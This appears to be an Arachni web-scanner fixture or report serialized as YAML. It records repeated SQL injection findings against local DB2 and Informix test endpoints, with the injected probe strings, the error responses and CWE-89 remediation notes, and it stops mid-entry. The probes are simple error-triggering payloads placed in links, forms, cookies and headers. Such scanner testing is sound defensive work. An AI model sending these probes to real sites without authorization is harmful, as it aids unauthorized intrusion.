remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:DB2 SQL error:) :match: ! 'DB2 SQL error:' :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :param_flip: true :injected_orig: ! '''`--' :altered: Parameter flip :element: link :params: !binary "aW5wdXQ=": !binary |- ZGVmYXVsdA== ! '''`--': !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :follow_location: true :injected: '' :combo: !binary "aW5wdXQ=": !binary |- ZGVmYXVsdA== ! '''`--': !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :action: http://localhost:7362/db2/link/flip?input=default :verification: :id: ! 'DB2 SQL error:' var: Parameter flip url: http://localhost:7362/db2/link/flip?input=default injected: '' id: ! 'DB2 SQL error:' regexp: (?i-mx:DB2 SQL error:) regexp_match: ! 'DB2 SQL error:' elem: link remarks: {} method: GET response: ! 
'["DB2 SQL error:\n[IBM][CLI Driver][DB2/6000]\nCLI Driver stuff DB2\nDB2 SQL error\n", nil]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OTE= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxNToyNSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: cookie2 url: http://localhost:7362/db2/cookie/append elem: cookie method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:DB2 SQL error:) :match: ! 'DB2 SQL error:' :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :injected_orig: ) :altered: !binary |- Y29va2llMg== :element: cookie :params: {} :follow_location: true :cookies: !binary "Y29va2llMg==": cookie value) :injected: cookie value) :combo: !binary "Y29va2llMg==": cookie value) :action: http://localhost:7362/db2/cookie/append :verification: :id: ! 'DB2 SQL error:' var: cookie2 url: http://localhost:7362/db2/cookie/append injected: cookie value) id: ! 'DB2 SQL error:' regexp: (?i-mx:DB2 SQL error:) regexp_match: ! 'DB2 SQL error:' elem: cookie remarks: :stuff: - Blah - Blah2 method: GET response: ! 
'DB2 SQL error: [IBM][CLI Driver][DB2/6000] CLI Driver stuff DB2 DB2 SQL error ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value) response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nzg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxNToyNyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: Parameter flip url: http://localhost:7362/db2/cookie/flip elem: cookie method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:DB2 SQL error:) :match: ! 'DB2 SQL error:' :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :injected_orig: ) :altered: Parameter flip :element: cookie :params: {} :follow_location: true :cookies: ): !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :injected: '' :combo: ): !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :action: http://localhost:7362/db2/cookie/flip :verification: :id: ! 'DB2 SQL error:' var: Parameter flip url: http://localhost:7362/db2/cookie/flip injected: '' id: ! 'DB2 SQL error:' regexp: (?i-mx:DB2 SQL error:) regexp_match: ! 'DB2 SQL error:' elem: cookie remarks: {} method: GET response: ! 
'[nil, "DB2 SQL error:\n[IBM][CLI Driver][DB2/6000]\nCLI Driver stuff DB2\nDB2 SQL error\n"]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value;)=95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59 response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OTE= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxNToyNyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: User-Agent url: http://localhost:7362/db2/header/append elem: header method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! 
"User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:DB2 SQL error:) :match: ! 'DB2 SQL error:' :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :injected_orig: ! '''`--' :altered: User-Agent :element: header :params: :follow_location: true :headers: User-Agent: arachni_user'`-- :injected: arachni_user'`-- :combo: User-Agent: arachni_user'`-- :action: http://localhost:7362/db2/header/append :verification: :id: ! 'DB2 SQL error:' var: User-Agent url: http://localhost:7362/db2/header/append injected: arachni_user'`-- id: ! 'DB2 SQL error:' regexp: (?i-mx:DB2 SQL error:) regexp_match: ! 'DB2 SQL error:' elem: header remarks: {} method: GET response: ! 
'DB2 SQL error: [IBM][CLI Driver][DB2/6000] CLI Driver stuff DB2 DB2 SQL error ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: arachni_user'`-- Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nzg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxNTozMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: Parameter flip url: http://localhost:7362/db2/header/flip elem: header method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:DB2 SQL error:) :match: ! 'DB2 SQL error:' :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :injected_orig: ! '''`--' :altered: Parameter flip :element: header :params: :follow_location: true :headers: ! '''`--': !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :injected: '' :combo: ! '''`--': !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :action: http://localhost:7362/db2/header/flip :verification: :id: ! 'DB2 SQL error:' var: Parameter flip url: http://localhost:7362/db2/header/flip injected: '' id: ! 'DB2 SQL error:' regexp: (?i-mx:DB2 SQL error:) regexp_match: ! 'DB2 SQL error:' elem: header remarks: {} method: GET response: ! '[nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, "DB2 SQL error:\n[IBM][CLI Driver][DB2/6000]\nCLI Driver stuff DB2\nDB2 SQL error\n", nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev ! 
'''`--': 95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59 Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MjM2 !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxNTozOSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: input url: http://localhost:7362/informix/form/append elem: form method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:com\.informix\.jdbc) :match: com.informix.jdbc :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :param_flip: true :injected_orig: ! '''`--' :altered: !binary |- aW5wdXQ= :element: form :params: !binary "aW5wdXQ=": default'`-- :follow_location: true :injected: default'`-- :combo: !binary "aW5wdXQ=": default'`-- :action: http://localhost:7362/informix/form/append :verification: :id: com.informix.jdbc var: input url: http://localhost:7362/informix/form/append injected: default'`-- id: com.informix.jdbc regexp: (?i-mx:com\.informix\.jdbc) regexp_match: com.informix.jdbc elem: form remarks: {} method: GET response: ! 
'An illegal character has been found in the statement com.informix.jdbc Exception stuff Informix ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OTY= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxNTo1MSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: Parameter flip url: http://localhost:7362/informix/form/flip elem: form method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! 
"User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:com\.informix\.jdbc) :match: com.informix.jdbc :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :param_flip: true :injected_orig: ) :altered: Parameter flip :element: form :params: !binary "aW5wdXQ=": !binary |- ZGVmYXVsdA== ): !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :follow_location: true :injected: '' :combo: !binary "aW5wdXQ=": !binary |- ZGVmYXVsdA== ): !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :action: http://localhost:7362/informix/form/flip :verification: :id: com.informix.jdbc var: Parameter flip url: http://localhost:7362/informix/form/flip injected: '' id: com.informix.jdbc regexp: (?i-mx:com\.informix\.jdbc) regexp_match: com.informix.jdbc elem: form remarks: {} method: GET response: ! 
'["An illegal character has been found in the statement\ncom.informix.jdbc\nException stuff Informix\n", nil]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTA4 !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxNTo1MSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: input url: http://localhost:7362/informix/link/append?input=default elem: link method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! 
"User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:com\.informix\.jdbc) :match: com.informix.jdbc :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :param_flip: true :injected_orig: ) :altered: !binary |- aW5wdXQ= :element: link :params: !binary "aW5wdXQ=": default) :follow_location: true :injected: default) :combo: !binary "aW5wdXQ=": default) :action: http://localhost:7362/informix/link/append?input=default :verification: :id: com.informix.jdbc var: input url: http://localhost:7362/informix/link/append?input=default injected: default) id: com.informix.jdbc regexp: (?i-mx:com\.informix\.jdbc) regexp_match: com.informix.jdbc elem: link remarks: {} method: GET response: ! 
'An illegal character has been found in the statement com.informix.jdbc Exception stuff Informix ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OTY= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxNTo1MiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: Parameter flip url: http://localhost:7362/informix/link/flip?input=default elem: link method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! 
"User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:com\.informix\.jdbc) :match: com.informix.jdbc :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :param_flip: true :injected_orig: ) :altered: Parameter flip :element: link :params: !binary "aW5wdXQ=": !binary |- ZGVmYXVsdA== ): !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :follow_location: true :injected: '' :combo: !binary "aW5wdXQ=": !binary |- ZGVmYXVsdA== ): !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :action: http://localhost:7362/informix/link/flip?input=default :verification: :id: com.informix.jdbc var: Parameter flip url: http://localhost:7362/informix/link/flip?input=default injected: '' id: com.informix.jdbc regexp: (?i-mx:com\.informix\.jdbc) regexp_match: com.informix.jdbc elem: link remarks: {} method: GET response: ! 
